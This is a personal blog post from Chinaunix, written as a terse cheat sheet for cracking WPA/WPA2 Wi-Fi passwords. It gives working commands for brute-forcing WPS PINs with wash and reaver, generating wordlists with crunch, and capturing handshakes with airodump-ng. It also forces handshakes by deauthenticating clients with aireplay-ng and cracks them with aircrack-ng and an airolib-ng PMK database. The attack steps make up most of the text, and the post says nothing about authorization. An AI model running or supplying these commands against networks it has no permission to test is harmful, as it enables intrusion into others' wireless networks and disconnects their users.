Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1751537
  • 博文数量: 297
  • 博客积分: 285
  • 博客等级: 二等列兵
  • 技术积分: 3006
  • 用 户 组: 普通用户
  • 注册时间: 2010-03-06 22:04
个人简介

Linuxer, ex IBMer. GNU https://hmchzb19.github.io/

文章分类

全部博文(297)

文章存档

2020年(11)

2019年(15)

2018年(43)

2017年(79)

2016年(79)

2015年(58)

2014年(1)

2013年(8)

2012年(3)

分类: LINUX

2017-09-29 13:58:29

#WPA cracking method with WPS enabled
in WPA each packet is encrypted with a unique temporary key this means the number of data packets that we collect is irrelevant.
WPA2 and WPA are similar, the only difference is that WPA2 use an algorithm called CCMP.

WPS Feature
WPS is a feaure that allows users to connect to WPS enabled network easily, using WPS button or only by clicking on WPS functionality.
Authentication is done using an 8 digit long pin, this means that there is a relatively small number of pin combination and using
brute force we can guess the pin in less than 10 hours.
A tool called reaver can then recover the WPA/WPA2 key from the pin.
Note: This flaw is in the WPS feature and not in WPA/WPA2,however it allows us to crack any WPA/WPA2 AP without using a wordlist and without any client.

#cracking WPA/WPA2 with WPS feature
wash -i wlan1

#arguments of wash
Required Arguments:
    -i, --interface=              Interface to capture packets on
    -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
    -c, --channel=                  Channel to listen on [auto]
    -o, --out-file=                Write data to file
    -n, --probes=                   Maximum number of probes to send to each AP in scan mode [15]
    -D, --daemonize                      Daemonize wash
    -5, --5ghz                           Use 5GHz 802.11 channels
    -s, --scan                           Use scan mode
    -u, --survey                         Use survey mode [default]
    -a, --all                            Show all APs, even those without WPS
    -h, --help                           Show help


#use reaver to crack WPA with WPS enable
reaver -b [BSSID] -c [channel] -i [interface]
eg:
reaver -b EC:88:XX:XX:XX:XX -c 1 -i wlan1
reaver -i wlan1 -b 78:A1:XX:XX:XX:XX -c 1 -vv

#WPA/WPA2 cracking with WPS disabled  
As explained before capturing WPA packets is not useful as they do not contain any info that can be used to crack the key.
The only packets that contain info that help us crack the password is the handshake packets.
Every time a client connects to the AP a four way hand shake occurs between the client and the AP.
By capturing the handshake,we can use aircrack to launch a word list attack against the handk shake to determine its key.
1. capture the handshake
2. A wordlist

#create a wordlist.
./crunch [min][max][characters=lower|upper|numbers|sumbols] -t[pattern] -o file
eg:
./crunch 6 8 123456!"&$% -o wordlist -t a@@@@b
crunch 8 8 aswrd0 -o wordlist -t P@@@@@@d
crunch 8 16 -f /path/to/charset.lst
crunch 8 16 -f /usr/share/rainbowcrack/charset.lst mixalpha-numeric -o mywordlist

#kill wpa_supplicant
airmon-ng check kill


#use aircrack-ng to crack the key, It does this by combining each password in the wordlist with AP name(essid)
#to compute a Pairwise Master Key(PMK) using the pbkdf2 algorithm, the PMK is then compared to the handshakd file.
aircrack-ng [HANDSHAKE FILE] -w [WORDLIST]
eg;
aircrack-ng is-01.cap -w wordlist

#start airodump-ng on the target AP
airodump-ng --channel 2 --bssid 14:D6:XX:XX:XX:XX -w 18102he wlan1
#deauth a client to get handshake
aireplay-ng --deauth 4 -a 14:D6:XX:XX:XX:XX -c 1C:5C:XX:XX:XX:XX wlan1
#crack
aircrack-ng 18102-01.cap -w wordlist

#cracking the key using airolib-ng
1.create a database and import wordlist.
airolib-ng [db_name] --import passwd [dictionary]
eg:
airolib-ng is-db --import passwd list
airolib-ng 18102-db --import passwd wordlist

2. import target ESSID
airolib-ng is-db --import essid [essid-file]
eg:
airolib-ng is-db --import essid essid-name

echo "18102He" > 18102id
airolib-ng 18102-db --import essid 18102id

3. Compute PMK for the wordlist
airolib-ng [db-name] --batch
eg:
airolib-ng is-db --batch

airolib-ng 18102-db --batch

4. Crack the key using the PMK database
aircrack-ng -r [db-ame] [handshake_file]
aircrack-ng -r is-db is-01.cap

aircrack-ng -r 18102-db 18102he-01.cap

#speed up he cracking process using a tool called hashcat which use GPU instead of the CPU for the cracking process.


#convert hankshake file format to hccap .
阅读(1369) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~